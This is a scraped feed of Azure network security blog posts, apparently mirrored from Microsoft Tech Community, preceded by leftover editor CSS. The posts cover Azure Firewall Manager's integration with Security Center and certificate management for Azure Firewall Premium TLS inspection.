stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> 
<DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; 
hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; 
text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; 
font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; 
inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; 
text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; 
font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: 
initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: 
initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: 
initial;
border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: 
initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; 
-webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> Fri, 16 Apr 2021 15:35:56 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-for-azure-firewall-in-azure-sentinel/ba-p/2244958 Mohit_Kumar 2021-04-16T15:35:56Z Azure Firewall Manager Is Now Integrated with Azure Security Center https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-firewall-manager-is-now-integrated-with-azure-security/ba-p/2228679 <P>&nbsp;</P> <P>Written in collaboration with&nbsp;<LI-USER uid="124214"></LI-USER>&nbsp;<SPAN>(Principal PM CxE Azure Security Center Team)</SPAN></P> <H2>&nbsp;</H2> <H2>Introduction</H2> <P>Azure Security Center is a unified infrastructure security management system that strengthens the security posture of your data centers, and provides advanced threat protection across your hybrid workloads in the cloud - whether they're in Azure or not - as well as on premises.&nbsp; Azure 
Firewall Manager is a security management service that provides central security policy and route management for cloud-based security perimeters.&nbsp; To provide unified infrastructure and network security management to you, we have now integrated Azure Firewall Manager with the Azure Security Center.</P> <H2>&nbsp;</H2> <H2>Key Benefit</H2> <P>With the integration of Azure Firewall Manager with Azure Security Center, customers will now have a single pane of glass view of their infrastructure and network security.&nbsp; Customers will be able to see the status of Network Security from the Azure Security Center directly.&nbsp; Customers will no longer have to go into 2 different blades: in ASC for infrastructure security and in Firewall Manager for Network Security.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1616457222819.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/266190iE90C7DE18D74A3DE/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1616457222819.png" alt="Mohit_Kumar_1-1616457222819.png" /></span></P> <P>&nbsp;</P> <P>To learn more about this integration, visit the Azure Security Center blog – <A title="Azure Network Security Visibility and Control using ASC integration with Azure Firewall Manager" href="https://gorovian.000webhostapp.com/?exam=t5/azure-security-center/azure-network-security-visibility-and-control-using-asc/ba-p/2228222?emcs_t=S2h8ZW1haWx8bWVudGlvbl9zdWJzY3JpcHRpb258S01LWjVaWjZBU0Y5RjV8MjIyODIyMnxBVF9NRU5USU9OU3xoSw" target="_blank" rel="noopener">Azure Network Security Visibility and Control using ASC integration with Azure Firewall Manager</A></P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <H2>Additional Resources</H2> <UL> <LI>To learn more about Azure Firewall Manager, visit: <A title="What is Azure Firewall Manager?" 
href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/firewall-manager</A></LI> <LI>To learn more about Azure Security Center, visit: <A title="Become an Azure Security Center Ninja" href="#" target="_blank" rel="noopener">https://aka.ms/ascninja</A></LI> <LI>Watch a demonstration of Azure Security Center integration with Azure Firewall Manager in <A title=" Azure Security Center in the Field - Out of Band" href="#" target="_blank" rel="noopener">this episode of Azure Security Center in the Field – Out of Band Edition</A></LI> </UL> <H2>&nbsp;</H2> Tue, 23 Mar 2021 00:53:56 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-firewall-manager-is-now-integrated-with-azure-security/ba-p/2228679 Mohit_Kumar 2021-03-23T00:53:56Z Certificate Management Overview for Azure Firewall Premium TLS Inspection https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/certificate-management-overview-for-azure-firewall-premium-tls/ba-p/2214763 <P>Azure Firewall Premium, which <A href="#" target="_blank" rel="noopener">entered Public Preview on February 16<SUP>th</SUP></A>, introduces some important <A href="#" target="_blank" rel="noopener">new security features</A>, including IDPS, TLS termination, and more powerful application rules that now handle full URLs and categories. This blog will focus on TLS termination, and more specifically how to deal with the complexities of certificate management.</P> <P>&nbsp;</P> <P>There is an overview of the TLS certificates used by clients, websites, and Azure Firewall in a typical web request that is subject to TLS termination <A href="#" target="_blank" rel="noopener">in our documentation</A> (diagram below). In summary, a Subordinate (Intermediate) CA certificate needs to be imported to a Key Vault for Azure Firewall to use. 
To ensure a seamless experience for clients, they all must trust the certificate issued by Azure Firewall.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_0-1615918522682.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/264481i31AAB06F65A2D857/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_0-1615918522682.png" alt="Anthony_Roman_0-1615918522682.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>The rough steps for enabling TLS Inspection are:</P> <OL> <LI>Issue and export a subordinate, or intermediate, CA certificate along with its private key.</LI> <LI>Save the certificate and key in a <A href="#" target="_blank" rel="noopener">Key Vault</A>.</LI> <LI>Create a Managed Identity for Firewall to use and allow it to access the Key Vault.</LI> <LI><A href="#" target="_blank" rel="noopener">Configure your Firewall Policy</A> for TLS Inspection.</LI> <LI>Ensure that clients trust the certificate that will be presented by Azure Firewall.</LI> </OL> <P>&nbsp;</P> <P>The rest of the blog will walk through the different ways to accomplish steps 1 and 5.</P> <P>&nbsp;</P> <P>There is also a <A href="#" target="_self">webinar recording on YouTube</A> with similar information and live demonstrations.</P> <P>&nbsp;</P> <H2>General Certificate Requirements</H2> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">From our docs</A>, the certificate issued must conform to the following:</P> <UL> <LI>It must be a single certificate, and shouldn’t include the entire chain of certificates.</LI> <LI>It must be valid for one year forward.</LI> <LI>It must be an RSA private key with minimal size of 4096 bytes.</LI> <LI>It must have the&nbsp;KeyUsage&nbsp;extension marked as Critical with the&nbsp;KeyCertSign&nbsp;flag (RFC 5280; 4.2.1.3 Key Usage).</LI> <LI>It must have the&nbsp;BasicConstraints&nbsp;extension marked as Critical 
(RFC 5280; 4.2.1.9 Basic Constraints).</LI> <LI>The&nbsp;CA&nbsp;flag must be set to TRUE.</LI> <LI>The Path Length must be greater than or equal to one.</LI> </UL> <P>&nbsp;</P> <P>These requirements can be fulfilled by either generating self-signed certificates on any server, or by using an existing Certificate Authority, possibly as part of a Public Key Infrastructure (PKI). Public Certificate Authorities will not issue a certificate of this type because it will be used to issue other certificates on behalf of the root or issuing CA. Since most public CAs are trusted by default on client operating systems, allowing others to issue certificates on behalf of those would be a major security risk.</P> <P>&nbsp;</P> <H2>Self-Signed Certificates</H2> <P>&nbsp;</P> <P>The quickest and easiest method of generating a certificate for use on Azure Firewall is to generate root and subordinate CA certs on any Windows, Linux, or MacOS machine using openssl. This is the recommended method to use for testing environments, due to its simplicity.</P> <P>&nbsp;</P> <P>There are <A href="#" target="_blank" rel="noopener">scripts in our documentation</A> that make this process very easy. If you are using these certificates in a production environment, be sure to secure the root CA certificate by storing it in a Key Vault.</P> <P>&nbsp;</P> <H2>Establishing Trust</H2> <P>&nbsp;</P> <P>If the certificate used on Azure Firewall is not trusted by the client making a web request, they will be met with an error, which would disrupt normal operations. The best way to establish trust is to add the Root CA that issued the Firewall certificate as a Trusted Root CA on every client device that will be sending traffic through the Firewall. 
You will need an exported .cer file from your Root CA.</P> <P>&nbsp;</P> <P>Using Ubuntu as the example for Linux, this can be done using <A href="#" target="_blank" rel="noopener">update-ca-certificates</A>.</P> <P>&nbsp;</P> <P>On Windows, you can use the UI or import using <A href="#" target="_blank" rel="noopener">Powershell</A>.</P> <P>&nbsp;</P> <P>This process can be scripted and run remotely if the environment allows it.</P> <P>&nbsp;</P> <H2>PKI</H2> <P>&nbsp;</P> <P>A Public Key Infrastructure can be used by organizations to manage trust within an enterprise. There are several advantages to using this approach rather than self-signed certificates, including:</P> <UL> <LI>CA infrastructure may already be in place in some environments, especially hybrid ones.</LI> <LI>Enterprise Root CA is automatically trusted by all domain-joined Windows computers. No extra steps are needed to establish trust.</LI> <LI>Certificate rotation and revocation can be done centrally via Group Policy, so changes are more easily managed.</LI> </UL> <P>&nbsp;</P> <P>Using PKI, you will not have to import your certificate on your Windows clients, since they will all automatically trust your Enterprise Root CA. The full process of generating, exporting, and configuring Azure Firewall to use a PKI certificate is <A href="#" target="_blank" rel="noopener">documented in a new article here</A>.</P> <P>&nbsp;</P> <H2>Intune</H2> <P>&nbsp;</P> <P>Intune does not generate certificates, but it can be a great tool to manage them on clients. If your Azure VMs are managed by Intune, you can use <A href="#" target="_blank" rel="noopener">certificate profiles</A> to add your chosen CA as trusted.</P> <P>&nbsp;</P> <H2>Custom Images</H2> <P>&nbsp;</P> <P>If your environment is not connected to or managed by Active Directory, Intune, MEM, or any other client management tool, you still have an option to deploy certificates at scale. 
<A href="#" target="_blank" rel="noopener">Using custom images</A>, you can install the trusted Root CA certificate, capture an image, and use that image to deploy or re-deploy your VM instances.</P> <P>&nbsp;</P> <P>This process works best in environments where servers are treated as “cattle” rather than “pets,” meaning that they are spun up and down often and automatically configured, rather than manually configured and maintained for long periods of time.</P> <P>&nbsp;</P> <H2>Summary</H2> <P>&nbsp;</P> <P>This has been an overview of some different methods available to create certificates for use on Azure Firewall Premium and establish trust for those certificates on your clients. This is certainly not an exhaustive list of the options out there, so we would like to hear more from you. Please leave a comment telling us what methods you are currently using or would like to use. We will use your feedback to create more documentation and other instructional content.</P> Tue, 31 Aug 2021 21:23:24 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/certificate-management-overview-for-azure-firewall-premium-tls/ba-p/2214763 Anthony_Roman 2021-08-31T21:23:24Z Enabling Central Visibility For DNS Using Azure Firewall Custom DNS and DNS Proxy https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/enabling-central-visibility-for-dns-using-azure-firewall-custom/ba-p/2156331 <P>Many of our customers use Azure DNS for name resolution when it comes to infrastructure they have in Azure. The setup with Azure DNS works like a charm and provides name resolution to Azure Infrastructure without doing any complex setup. 
